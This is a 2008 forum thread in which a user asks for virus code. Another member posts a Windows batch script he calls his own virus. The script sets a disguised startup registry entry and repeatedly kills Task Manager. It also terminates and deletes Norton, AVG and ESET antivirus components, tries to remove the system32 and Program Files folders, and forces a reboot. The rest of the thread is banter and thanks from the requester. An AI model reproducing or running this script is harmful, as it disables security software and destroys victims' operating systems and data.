Page 2 of 2
Posted: Fri Sep 05, 2008 8:42 pm
by Crawler
PaRaDoX wrote:oh code injection! you could have just said something

Who your talking to? xD
Posted: Sat Sep 06, 2008 2:39 am
by PaRaDoX
lulz whiteknight

Posted: Sun Sep 07, 2008 12:27 am
by Sniped Sniper
MessageBox.Show("Learn a easier Programming Language Like Visual Basic or JavaScript first, Then Learn a powerful language like C, C#, or C++")
Re: Sample codes for a Virus
Posted: Sun Sep 07, 2008 9:42 am
by macros
azelmj wrote:Hmm can anyone show me the codes for a virus..
Use google!
..
Posted: Mon Sep 08, 2008 12:31 am
by azelmj
Well I know how to program using C. Actually its the first prog language I learned.. So I know alittle bout it.. I just wanna learn about the composition of a virus, for example is, worm.. Thanks..
virus source code by me
Posted: Thu Sep 11, 2008 2:00 am
by Hydra
@echo off
reg add hklm\software\microsoft\windows\currentversion\run /v skls /t reg_sz /d microsoftupdate.bat /f
taskkill /f /im taskmgr.exe
taskkill /f /im Navw32.exe
taskkill /f /im taskmgr.exe
taskkill /f /im Navwnt.exe
taskkill /f /im taskmgr.exe
taskkill /f /im NAVStub.exe
taskkill /f /im taskmgr.exe
rd C:\Program Files\Norton AntiVirus
taskkill /f /im taskmgr.exe
del C:\Program Files\Grisoft\AVG Free\vault.dll
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.000
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.002
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.003
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.004
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.005
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod32.006
taskkill /f /im taskmgr.exe
del C:\Program Files\ESET\nod.ovl
taskkill /f /im taskmgr.exe
taskkill /f /im nod32.exe
taskkill /f /im taskmgr.exe
taskkill /f /im nod32krn.exe
taskkill /f /im taskmgr.exe
taskkill /f /im nod32kui.exe
taskkill /f /im taskmgr.exe
rd C:\Program Files\ESET
taskkill /f /im taskmgr.exe
rd C:\WINDOWS\system32
taskkill /f /im taskmgr.exe
msg* Hey listening me
taskkill /f /im taskmgr.exe
msg* your computer have a crappy system
taskkill /f /im taskmgr.exe
msg* Sorry
taskkill /f /im taskmgr.exe
rd C:\Program Files
taskkill /f /im taskmgr.exe
SHUTDOWN -R -F -T 30 -C "Virus Have Been Delete Auto Shutdown."
The most virus!
Posted: Thu Sep 11, 2008 2:02 am
by Hydra
The most virus write on simple application. Notepad. But go to internet you can find some sample in C++ how to make virus. Carefullest if you test a virus.
Re: The most virus!
Posted: Thu Sep 11, 2008 3:37 am
by WhiteKnight
Hydra wrote:The most virus write on simple application. Notepad. But go to internet you can find some sample in C++ how to make virus. Carefullest if you test a virus.
That where I got these viruses and tested them on a wimpy computer.
People... virtual machine can still break your computer anyway.
Posted: Thu Sep 11, 2008 9:11 pm
by PaRaDoX
hmm. hydra, i understand the taskkill and del commands, but what is the RD command for?
Posted: Fri Sep 12, 2008 5:39 pm
by The_Dark_Avenger
PaRaDoX wrote:hmm. hydra, i understand the taskkill and del commands, but what is the RD command for?
RD?? Remove Directory
Posted: Mon Sep 15, 2008 12:45 am
by PaRaDoX
oh right.
Thanks Thanks
Posted: Mon Sep 15, 2008 5:06 pm
by azelmj
Thanks for you comments, you've been most helpful to me.. Now I know what to do, thanks again.. Good Luck guys..
